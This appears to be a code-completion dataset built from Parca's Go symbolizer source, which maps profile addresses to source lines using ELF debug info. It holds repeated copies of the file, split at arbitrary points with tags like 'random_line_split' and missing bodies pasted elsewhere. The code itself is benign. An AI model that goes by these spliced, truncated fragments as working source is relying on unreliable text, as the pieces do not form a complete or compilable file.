if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
}
return lines
} | random_line_split |
|
symbolizer.go | // Copyright 2022-2023 The Parca Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package symbolizer
import (
"context"
"debug/elf"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"time"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
debuginfopb "github.com/parca-dev/parca/gen/proto/go/parca/debuginfo/v1alpha1"
pb "github.com/parca-dev/parca/gen/proto/go/parca/metastore/v1alpha1"
"github.com/parca-dev/parca/pkg/debuginfo"
"github.com/parca-dev/parca/pkg/profile"
"github.com/parca-dev/parca/pkg/runutil"
"github.com/parca-dev/parca/pkg/symbol/addr2line"
"github.com/parca-dev/parca/pkg/symbol/demangle"
"github.com/parca-dev/parca/pkg/symbol/elfutils"
)
var (
ErrNotValidElf = errors.New("not a valid ELF file")
ErrNoDebuginfo = errors.New("no debug info found")
ErrLinerFailed = errors.New("liner creation failed")
)
type DebuginfoMetadata interface {
SetQuality(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType, quality *debuginfopb.DebuginfoQuality) error
Fetch(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType) (*debuginfopb.Debuginfo, error)
}
// liner is the interface implemented by symbolizers
// which read an object file (symbol table or debug information) and return
// source code lines by a given memory address.
type liner interface {
PCToLines(pc uint64) ([]profile.LocationLine, error)
PCRange() ([2]uint64, error)
Close() error
File() string
}
type Option func(*Symbolizer)
func WithAttemptThreshold(t int) Option {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
}
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
// Fetch ensures that the debug info for the given build ID is available on
// a local filesystem and returns a path to it.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
		if len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbolization request failed", "err", err)
continue
}
if liner != nil {
newLinerCache[mapping.BuildId] = liner
}
}
for k := range newLinerCache {
delete(s.linerCache, k)
}
for _, liner := range s.linerCache {
// These are liners that didn't show up in the latest iteration.
if err := liner.Close(); err != nil {
level.Debug(s.logger).Log("msg", "failed to close liner", "err", err)
}
if err := os.Remove(liner.File()); err != nil {
level.Debug(s.logger).Log("msg", "failed to remove liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes the
// given locations.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
		// Check if we already attempted to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found |
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsToSymbolize++
}
}
return locationsToSymbolize
}
// newLiner creates a new liner for the given mapping and object file path.
func (s *Symbolizer) newLiner(filepath string, f *elf.File, quality *debuginfopb.DebuginfoQuality) (liner, error) {
switch {
case quality.HasDwarf:
lnr, err := addr2line.DWARF(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create DWARF liner: %w", err)
}
return lnr, nil
case quality.HasGoPclntab:
lnr, err := addr2line.Go(s.logger, filepath, f)
if err != nil {
return nil, fmt.Errorf("failed to create Go liner: %w", err)
}
return lnr, nil
// TODO CHECK plt
case quality.HasSymtab || quality.HasDynsym:
lnr, err := addr2line.Symbols(s.logger, filepath, f, s.demangler)
if err != nil {
return nil, fmt.Errorf("failed to create Symtab liner: %w", err)
}
return lnr, nil
default:
return nil, ErrLinerFailed
}
}
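// Note on the switch above (comment added for clarity, not in the original file):
// liners are chosen by precedence — DWARF, then Go pclntab, then symtab/dynsym.
// For example, debug info reporting both DWARF and a symbol table gets the DWARF
// liner (variable names below are illustrative):
//
//	q := &debuginfopb.DebuginfoQuality{HasDwarf: true, HasSymtab: true}
//	lnr, err := s.newLiner(path, f, q) // resolves to addr2line.DWARF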
// pcToLines returns the source lines for the given PC while keeping track of symbolization attempts and failures.
func (s *Symbolizer) pcToLines(liner liner, key string, addr uint64) []profile.LocationLine {
lines, err := liner.PCToLines(addr)
level.Debug(s.logger).Log("msg", "symbolized location", "build_id", key, "address", addr, "lines_count", len(lines), "err", err, "liner_type", fmt.Sprintf("%T", liner))
if err != nil {
// Error bookkeeping.
if prev, ok := s.symbolizationAttempts[key][addr]; ok {
prev++
if prev >= s.attemptThreshold {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
} else {
s.symbolizationAttempts[key][addr] = prev
}
return nil
}
// First failed attempt.
s.symbolizationAttempts[key] = map[uint64]int{addr: 1}
return nil
}
if len(lines) == 0 {
if _, ok := s.symbolizationFailed[key]; ok {
s.symbolizationFailed[key][addr] = struct{}{}
} else {
s.symbolizationFailed[key] = map[uint64]struct{}{addr: {}}
}
delete(s.symbolizationAttempts[key], addr)
}
return lines
}
| {
locationsToSymbolize++
continue
} | conditional_block |
symbolizer.go | // Copyright 2022-2023 The Parca Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package symbolizer
import (
"context"
"debug/elf"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"time"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
debuginfopb "github.com/parca-dev/parca/gen/proto/go/parca/debuginfo/v1alpha1"
pb "github.com/parca-dev/parca/gen/proto/go/parca/metastore/v1alpha1"
"github.com/parca-dev/parca/pkg/debuginfo"
"github.com/parca-dev/parca/pkg/profile"
"github.com/parca-dev/parca/pkg/runutil"
"github.com/parca-dev/parca/pkg/symbol/addr2line"
"github.com/parca-dev/parca/pkg/symbol/demangle"
"github.com/parca-dev/parca/pkg/symbol/elfutils"
)
var (
ErrNotValidElf = errors.New("not a valid ELF file")
ErrNoDebuginfo = errors.New("no debug info found")
ErrLinerFailed = errors.New("liner creation failed")
)
type DebuginfoMetadata interface {
SetQuality(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType, quality *debuginfopb.DebuginfoQuality) error
Fetch(ctx context.Context, buildID string, typ debuginfopb.DebuginfoType) (*debuginfopb.Debuginfo, error)
}
// liner is the interface implemented by symbolizers
// which read an object file (symbol table or debug information) and return
// source code lines by a given memory address.
type liner interface {
PCToLines(pc uint64) ([]profile.LocationLine, error)
PCRange() ([2]uint64, error)
Close() error
File() string
}
type Option func(*Symbolizer)
func WithAttemptThreshold(t int) Option |
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
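// Usage sketch (not part of the original file): options are passed variadically
// to New; the argument values below are hypothetical.
//
//	s := New(logger, reg, metadata, metastore, fetcher, tmpDir, 128,
//		WithDemangleMode("full"),
//		WithAttemptThreshold(5),
//	)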
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
// Fetch ensures that the debug info for the given build ID is available on
// a local filesystem and returns a path to it.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
		if len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbolization request failed", "err", err)
continue
}
if liner != nil {
newLinerCache[mapping.BuildId] = liner
}
}
for k := range newLinerCache {
delete(s.linerCache, k)
}
for _, liner := range s.linerCache {
// These are liners that didn't show up in the latest iteration.
if err := liner.Close(); err != nil {
level.Debug(s.logger).Log("msg", "failed to close liner", "err", err)
}
if err := os.Remove(liner.File()); err != nil {
level.Debug(s.logger).Log("msg", "failed to remove liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes the
// given locations.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
